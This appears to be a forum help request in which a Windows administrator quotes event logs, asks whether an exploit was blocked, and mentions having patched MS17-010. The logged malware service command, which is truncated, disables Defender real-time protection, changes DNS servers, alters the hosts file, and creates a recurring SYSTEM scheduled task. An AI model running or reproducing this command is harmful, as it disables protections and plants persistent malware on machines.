From Windows event log, did the exploit was blocked? Can I get what CVE number from event log so I can know the specific KB number?
39536 Apr 13 08:31 Information Microsoft-Windows-Kernel-General
1 Possible detection of CVE: 2020-04-13T01:31:16.580703600Z
Additional Information: 2020-04-13T01:31:16.580796000Z
This Event is generated when an attempt to exploit a known vulnerability 2020-04-13T01:31:16.580703600Z) is detected.
This Event is raised by a User mode process.
Also I got this malware log
Apr 13 08:29 Information Service Control Manager 1073748869 A service was installed in the system.
Service Name: SYYHQSMMFDSEFEVOTKNH
Service File Name: %COMSPEC% /C "cmd /c powershell -c
Set-MpPreference -DisableRealtimeMonitoring $true;(get-wmiobject -class win32_networkadapterconfiguration -filter ipenabled=true).
SetDNSServerSearchOrder(@('8.8.8.8','9.9.9.9'))&powershell -c attrib -R C:\WINDOWS\system32\drivers\etc\hosts;$rh=-join([char[]](Get-Random -Count (6+(Get-Random)%6)(65..90+97..122)));$cmd='schtasks /create /ru system /sc MINUTE /mo 120 /tn Rtsa1 /F /tr \"powershell -c ''*awcna*
I already have patched the machine with MS 17-010 and haven't found successful logon from the log. So confusing..
